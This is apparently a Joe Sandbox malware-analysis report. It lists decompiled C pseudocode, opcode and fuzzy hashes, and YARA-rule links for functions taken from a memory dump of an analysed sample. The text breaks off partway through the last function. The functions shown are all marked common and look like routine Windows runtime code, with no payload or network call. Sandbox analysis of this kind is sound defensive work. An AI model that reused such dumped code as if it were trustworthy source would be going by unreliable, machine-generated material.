Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce98e695ee1b8558579121c74223653ebf0755f564ec5d140bec49d48da86a5a
Instruction ID: 7495ee9b37b919c53777465128ea524ae8bceabf396a7cc5a1f1609173332aa0
Opcode Fuzzy Hash: ce98e695ee1b8558579121c74223653ebf0755f564ec5d140bec49d48da86a5a
Instruction Fuzzy Hash: 2D116D71A00208AFDB44DF64C854FAE7BB6FB44704F004099FA119B280DA39BD15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D3C5FC Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04D3C5FC(intOrPtr __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				short _v70;
				char _v76;
				void* __edi;
				void* __esi;
				signed char* _t25;
				intOrPtr _t27;
				intOrPtr _t31;
				intOrPtr _t40;
				intOrPtr _t43;
				signed int _t44;

				_t46 = (_t44 & 0xfffffff8) - 0x48;
				_v8 =  *0x4dab370 ^ (_t44 & 0xfffffff8) - 0x00000048;
				_v36 = __ecx;
				_v70 = 0xd20;
				_v44 = _a16;
				_v24 = _a4;
				_t37 = _a20;
				_v40 = _a20;
				_v32 = __edx;
				_v28 = _a8;
				_v20 = _a12;
				if(E04CC3C40() == 0) {
					_t25 = 0x7ffe038e;
				} else {
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				}
				_push( &_v76);
				_push(0x1c);
				_push( *_t25 & 0x000000ff);
				_t27 = E04CF2F90();
				_pop(_t40);
				_t43 = 0x20402;
				return E04CF4B50(_t27, _t31, _v24 ^ _t46, _t37, _t40, _t43);
			}

0x04d3c604
0x04d3c60e
0x04d3c617
0x04d3c61b
0x04d3c627
0x04d3c631
0x04d3c635
0x04d3c63b
0x04d3c63f
0x04d3c643
0x04d3c647
0x04d3c652
0x04d3c664
0x04d3c654
0x04d3c65d
0x04d3c65d
0x04d3c670
0x04d3c671
0x04d3c678
0x04d3c679
0x04d3c682
0x04d3c683
0x04d3c68e

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1964fd54df736e2e18b2489bb7c8d88f6377c2d0e5d3de63c2e061a974aeef55
Instruction ID: bffb3c2e8eb9aa008d995b9b950a1bd09e30ffa18f3e1c23696fb0ea32df45ac
Opcode Fuzzy Hash: 1964fd54df736e2e18b2489bb7c8d88f6377c2d0e5d3de63c2e061a974aeef55
Instruction Fuzzy Hash: 10118BB16183049FC700DF29D841A5BBBE8EF88B10F00895EFA58D73A1E634E910CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D3C691 Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04D3C691(intOrPtr __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				short _v70;
				char _v76;
				void* __edi;
				void* __esi;
				signed char* _t25;
				intOrPtr _t27;
				intOrPtr _t31;
				intOrPtr _t40;
				intOrPtr _t43;
				signed int _t44;

				_t46 = (_t44 & 0xfffffff8) - 0x48;
				_v8 =  *0x4dab370 ^ (_t44 & 0xfffffff8) - 0x00000048;
				_v36 = __ecx;
				_v70 = 0xd21;
				_v44 = _a16;
				_v24 = _a4;
				_t37 = _a20;
				_v40 = _a20;
				_v32 = __edx;
				_v28 = _a8;
				_v20 = _a12;
				if(E04CC3C40() == 0) {
					_t25 = 0x7ffe038e;
				} else {
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				}
				_push( &_v76);
				_push(0x1c);
				_push( *_t25 & 0x000000ff);
				_t27 = E04CF2F90();
				_pop(_t40);
				_t43 = 0x20402;
				return E04CF4B50(_t27, _t31, _v24 ^ _t46, _t37, _t40, _t43);
			}

0x04d3c699
0x04d3c6a3
0x04d3c6ac
0x04d3c6b0
0x04d3c6bc
0x04d3c6c6
0x04d3c6ca
0x04d3c6d0
0x04d3c6d4
0x04d3c6d8
0x04d3c6dc
0x04d3c6e7
0x04d3c6f9
0x04d3c6e9
0x04d3c6f2
0x04d3c6f2
0x04d3c705
0x04d3c706
0x04d3c70d
0x04d3c70e
0x04d3c717
0x04d3c718
0x04d3c723

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4ef71cd2ef75299f4b9c563e41f3bb45cc9c7f155f08fc7df1fccd1ddb1b15f
Instruction ID: da9825e361bbc9f1c190974f6fbe54e42c000c84cba6154e9ff33939f9104b2f
Opcode Fuzzy Hash: c4ef71cd2ef75299f4b9c563e41f3bb45cc9c7f155f08fc7df1fccd1ddb1b15f
Instruction Fuzzy Hash: 82118BB26183449FC700DF69D841A5BBBE8EF88710F00895EFA58D73A0E634E900CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D84600 Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04D84600(intOrPtr _a4) {
				void* __ecx;
				unsigned int _t10;
				unsigned int* _t20;

				_t28 = _a4;
				_t20 = _a4 + 0x8c;
				_t10 =  *_t20;
				if(_t10 >= 2) {
					_t10 =  *_t20;
					do {
						asm("lock cmpxchg [edx], ecx");
					} while ((_t10 & 1) != 0);
					_t27 = _t10 >> 1;
					if(_t10 >> 1 != 0) {
						E04CDDB40(_t28 + 0x20,  ~_t27, 0);
						if(E04CC3C40() == 0) {
							_t10 = 0x7ffe0386;
						} else {
							_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						}
						if( *_t10 != 0) {
							return E04D84AE8( *((intOrPtr*)(_t28 + 0x5c)), _t28 + 0x78,  *((intOrPtr*)(_t28 + 0x30)),  *((intOrPtr*)(_t28 + 0x34)),  *((intOrPtr*)(_t28 + 0x3c)), _t27);
						}
					}
				}
				return _t10;
			}

0x04d84607
0x04d8460b
0x04d84611
0x04d84616
0x04d8461b
0x04d8461d
0x04d84621
0x04d84621
0x04d84629
0x04d8462b
0x04d84636
0x04d84642
0x04d84654
0x04d84644
0x04d8464d
0x04d8464d
0x04d8465c
0x00000000
0x04d8466e
0x04d8465c
0x04d8462b
0x04d84677

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
Instruction ID: 5d6c9d8bd7da12e3c09e0bb31703e70ab7dd968ce0f904e2c106a672ce355973
Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
Instruction Fuzzy Hash: 1B01D4722006029FD725EA65D842FA7B3EAFFC5304F04895DE6528B660EA70F880CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D3C0E0 Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04D3C0E0(intOrPtr __ebx, intOrPtr __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* __esi;
				intOrPtr _t28;
				char* _t30;
				intOrPtr _t37;
				intOrPtr _t38;
				signed int _t39;

				_t37 = __edi;
				_t28 = __ebx;
				_v8 =  *0x4dab370 ^ _t39;
				_t36 = _a16;
				_push(1);
				_push(_a28);
				_v16 = _a4;
				_v12 = _a8;
				_push(_a24);
				_push(_a12);
				_push(_a20);
				_push(_a16);
				_push( &_v16);
				_t38 = E04CF4690();
				if(E04CC3C40() == 0) {
					_t30 = 0x7ffe038e;
				} else {
					_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				}
				if( *_t30 != 0 && _t38 >= 0) {
					E04D3C592(_a20, _v16, _v12);
				}
				return E04CF4B50(_t38, _t28, _v8 ^ _t39, _t36, _t37, _t38);
			}

0x04d3c0e0
0x04d3c0e0
0x04d3c0ef
0x04d3c0f8
0x04d3c0fc
0x04d3c0fe
0x04d3c101
0x04d3c107
0x04d3c10d
0x04d3c10e
0x04d3c10f
0x04d3c115
0x04d3c116
0x04d3c11c
0x04d3c125
0x04d3c139
0x04d3c127
0x04d3c131
0x04d3c131
0x04d3c141
0x04d3c150
0x04d3c150
0x04d3c163

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e216321341808418790d03ad51d0fafaf97b84d0af530876481a3279b4487ef
Instruction ID: b19a70b7ff0d0f5ded4c38a3b65632732b13146f0f87094e9a9e00a8d5b36cc3
Opcode Fuzzy Hash: 6e216321341808418790d03ad51d0fafaf97b84d0af530876481a3279b4487ef
Instruction Fuzzy Hash: F5111B71A11208AFDB15DF64D854AAE7BBAFB48704F004099FA05A7350DA35ED51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D6EFD3 Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04D6EFD3(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4dab370 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04CF8F40( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04CC3C40() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04d6efd3
0x04d6efd3
0x04d6efe2
0x04d6efec
0x04d6eff1
0x04d6eff3
0x04d6effe
0x04d6f004
0x04d6f00c
0x04d6f00f
0x04d6f012
0x04d6f01d
0x04d6f02f
0x04d6f01f
0x04d6f028
0x04d6f028
0x04d6f03a
0x04d6f03b
0x04d6f03d
0x04d6f042
0x04d6f055

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bbe97d6b176101db954192de531a403e815664eeb6ad6297fb156c4ada312bb
Instruction ID: b6a2338c1b63b631ff33959c49093cde8b90d3afb00f48dd5076246976b6e069
Opcode Fuzzy Hash: 0bbe97d6b176101db954192de531a403e815664eeb6ad6297fb156c4ada312bb
Instruction Fuzzy Hash: 54017171A10258AFDB14EF69D841FAEBBB9EF44704F40406AFA00EB381D675EA41DB94

Uniqueness

Uniqueness Score: -1.00%

Function 04CE415F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04CE415F(signed short* __ecx) {
				char _v8;
				void* _t13;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t27;
				signed short* _t30;
				intOrPtr _t33;

				_push(__ecx);
				_t30 = __ecx;
				_t33 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t13 = L04CE432E(__ecx) - 1;
				if(_t13 == 0) {
					L2:
					_t15 = E04CE41BB(_t30,  *(_t33 + 0x26) & 0x0000ffff, _t36,  &_v8);
					if(_t15 >= 0) {
						_t27 = _v8;
						 *0x4da6390 = _t27;
						 *((intOrPtr*)(_t33 + 0x2c)) =  *((intOrPtr*)(_t27 + 4));
						 *((intOrPtr*)(_t33 + 0x28)) =  *((intOrPtr*)(_t27 + 0x10));
						 *((short*)(_t33 + 0x24)) =  *((intOrPtr*)(_t27 + 0xc));
						_t15 = 0;
					}
					L4:
					return _t15;
				}
				_t19 = _t13 - 1;
				_t36 = _t19;
				if(_t19 != 0) {
					_t20 = _t19 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						L10:
						_t15 = 0xc000000d;
						goto L4;
					}
					_t21 = _t20 - 1;
					__eflags = _t21;
					if(_t21 == 0) {
						goto L10;
					}
					_t22 = _t21 - 1;
					__eflags = _t22;
					if(_t22 == 0) {
						goto L10;
					}
					_t23 = _t22 - 1;
					__eflags = _t23;
					if(__eflags == 0) {
						goto L2;
					}
					__eflags = _t23 - 1;
					if(__eflags == 0) {
						goto L2;
					}
					goto L10;
				}
				goto L2;
			}

0x04ce4164
0x04ce416d
0x04ce416f
0x04ce4177
0x04ce417a
0x04ce4185
0x04ce418f
0x04ce4196
0x04ce4198
0x04ce419b
0x04ce41a4
0x04ce41aa
0x04ce41b1
0x04ce41b5
0x04ce41b5
0x04ce41b7
0x04ce41ba
0x04ce41ba
0x04ce417c
0x04ce417c
0x04ce417f
0x04d22e19
0x04d22e19
0x04d22e1c
0x04d22e3a
0x04d22e3a
0x00000000
0x04d22e3a
0x04d22e1e
0x04d22e1e
0x04d22e21
0x00000000
0x00000000
0x04d22e23
0x04d22e23
0x04d22e26
0x00000000
0x00000000
0x04d22e28
0x04d22e28
0x04d22e2b
0x00000000
0x00000000
0x04d22e31
0x04d22e34
0x00000000
0x00000000
0x00000000
0x04d22e34
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96394a5922ad6d00c05e5f0f35d1808d1706bee2f25c2bad26bd58f1997940c7
Instruction ID: e63ed8e8ff0f3d7d938edce92a0539dce552678d84a84a3794b8aee6bf8302f9
Opcode Fuzzy Hash: 96394a5922ad6d00c05e5f0f35d1808d1706bee2f25c2bad26bd58f1997940c7
Instruction Fuzzy Hash: C601A73A1042219BCB29CF7E9618671BBE9FB693187080159E405C3B14D337FA02D718

Uniqueness

Uniqueness Score: -1.00%

Function 04CA821B Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04CA821B(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4dab370 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4c85dfc;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04CA8270() != 0 &&  *0x4da3340 > 5) {
					E04D3101A( &_v44, _t27);
					_t22 =  &_v28;
					E04D3101A( &_v28, _t28);
					_t11 = E04D3105C(0x4da3340, 0x4c90d0e,  &_v28, _t22, 4,  &_v76);
				}
				return E04CF4B50(_t11, _t17, _v8 ^ _t29, 0x4c90d0e, _t27, _t28);
			}

0x04ca822a
0x04ca822d
0x04ca8235
0x04ca8239
0x04ca8269
0x04ca8269
0x04ca823b
0x04ca823b
0x04ca8240
0x00000000
0x04ca8242
0x04ca8242
0x04ca8242
0x04ca8240
0x04ca824c
0x04d0b314
0x04d0b31b
0x04d0b31e
0x04d0b335
0x04d0b335
0x04ca8268

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74392d78ecdf70f36a50e14c5a8f1efbe74b39fa8fc29c94660dc00766a0ad75
Instruction ID: 792efc9e7d70a6c07cdf1451481cc62ec2f8989cc5b449bbb3d852eb83e6ed93
Opcode Fuzzy Hash: 74392d78ecdf70f36a50e14c5a8f1efbe74b39fa8fc29c94660dc00766a0ad75
Instruction Fuzzy Hash: FF01A271B04506DBEB14FF66D9149BEB7BAEB8061CB08416AD901A7284DE24FD16C670

Uniqueness

Uniqueness Score: -1.00%

Function 04CB24A2 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04CB24A2(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				signed int _t22;
				signed int _t25;

				_push(__ecx);
				_t16 = __edx;
				_v8 = __ecx;
				_t22 = 0;
				_t25 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
				_t27 = _t25;
				if(_t25 != 0) {
					_t3 = _t25 + 0x14; // 0x14
					if(E04CB3CF0(_t16, 0, _t25, _t27, _t3, 0x4d69a30, _t25, 0) >= 0) {
						_t22 = _t25;
						 *((intOrPtr*)(_t25 + 8)) = _v8;
						 *((intOrPtr*)(_t25 + 0xc)) = _t16;
						_t25 = 0;
					}
					if(_t25 != 0) {
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25);
					}
				}
				return _t22;
			}

0x04cb24a7
0x04cb24b8
0x04cb24ba
0x04cb24bd
0x04cb24c4
0x04cb24c6
0x04cb24c8
0x04cb24d1
0x04cb24dc
0x04cb24e1
0x04cb24e3
0x04cb24e6
0x04cb24e9
0x04cb24e9
0x04cb24ed
0x04d0fc01
0x04d0fc01
0x04cb24ed
0x04cb24f9

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d13f249f5b398af7bca9def56685ca18837808ae17a3943fc7d34353a8a2eb
Instruction ID: cf8895bd3fbec7ef0db8996b255f6c00a19a7001daac4d532f81faac081153e9
Opcode Fuzzy Hash: 80d13f249f5b398af7bca9def56685ca18837808ae17a3943fc7d34353a8a2eb
Instruction Fuzzy Hash: DBF0F932641660B7D732DF569D44F877AAAEBC4B50F148068A94597640C570FD01DAE0

Uniqueness

Uniqueness Score: -1.00%

Function 04D6EEE7 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04D6EEE7(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				void* __edi;
				void* __esi;
				void* _t17;
				signed char* _t18;
				intOrPtr _t24;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int _t36;

				_t29 = __edx;
				_t24 = __ebx;
				_v8 =  *0x4dab370 ^ _t36;
				_t31 = __edx;
				_t34 = __ecx;
				E04CF8F40( &_v52, 0, 0x2c);
				_v20 = _t34;
				_v46 = 0x1039;
				_v16 = _t31;
				_v12 = _a4;
				_t17 = E04CC3C40();
				_t32 = _t30;
				_t35 = _t33;
				if(_t17 == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t24, _v8 ^ _t36, _t29, _t32, _t35);
			}

0x04d6eee7
0x04d6eee7
0x04d6eef6
0x04d6ef00
0x04d6ef05
0x04d6ef07
0x04d6ef11
0x04d6ef17
0x04d6ef1e
0x04d6ef21
0x04d6ef24
0x04d6ef29
0x04d6ef2a
0x04d6ef2d
0x04d6ef3f
0x04d6ef2f
0x04d6ef38
0x04d6ef38
0x04d6ef4a
0x04d6ef4b
0x04d6ef4d
0x04d6ef52
0x04d6ef63

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ba8affe95fcd08d9d72d58ec4daa110bb01b50462c6134f808b399da44e696
Instruction ID: e30ec596138deb2b0e05840778785be30497c74e4240b66db7c7d96732b7fcde
Opcode Fuzzy Hash: f3ba8affe95fcd08d9d72d58ec4daa110bb01b50462c6134f808b399da44e696
Instruction Fuzzy Hash: E3017171A10258ABEB14EBA5D805EAEB7B9EF44704F04406AF501EB281D678E9018794

Uniqueness

Uniqueness Score: -1.00%

Function 04CAC2B0 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CAC2B0(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				signed int _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04CADC40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04CACDF0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							E04CACEF0(__ecx, _t14, 0xfff);
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x04cac2b4
0x04cac2b6
0x04cac2bb
0x04cac2fa
0x04cac2c1
0x04cac2c6
0x04cac2ca
0x04cac2f3
0x04cac2cc
0x04cac2d7
0x04cac2db
0x04d09db5
0x04d09dc7
0x04d09dcc
0x04cac2e1
0x04cac2e6
0x04cac2e8
0x04cac2e8
0x04cac2db
0x04cac2ca
0x04cac2ed
0x04cac2f2

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
Instruction ID: 1be12bafa11588dba86eacf3906efc46b5734621865a0c4d52794676aee9e027
Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
Instruction Fuzzy Hash: 71F0F6736405239BD3321ADA4840B7BAAA79FC5B6CF1A0135E506BB640CA60AC22A6D4

Uniqueness

Uniqueness Score: -1.00%

Function 04D84CD2 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04D84CD2(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4dab370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c23;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04CC3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x403);
				_push( *_t18 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), 0x1c23, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04d84cd2
0x04d84ce1
0x04d84ce9
0x04d84cf2
0x04d84cf5
0x04d84cf9
0x04d84cfc
0x04d84cff
0x04d84d02
0x04d84d05
0x04d84d0f
0x04d84d21
0x04d84d11
0x04d84d1a
0x04d84d1a
0x04d84d2c
0x04d84d2d
0x04d84d2f
0x04d84d34
0x04d84d48

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7264bc4a3e70bbf98707028d5871bd355887c6cc37072dc94f8a37e5b1ac7bec
Instruction ID: e7ee7df3413dc7a76d2b570f4a67b4183b3d4c13acc8b5594a8227e4b7c22cf4
Opcode Fuzzy Hash: 7264bc4a3e70bbf98707028d5871bd355887c6cc37072dc94f8a37e5b1ac7bec
Instruction Fuzzy Hash: FE012171A10219AFDB04DFA9E9519EEB7F8FF48704F10405AF900E7340E634EA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 04D84C59 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04D84C59(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4dab370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c22;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
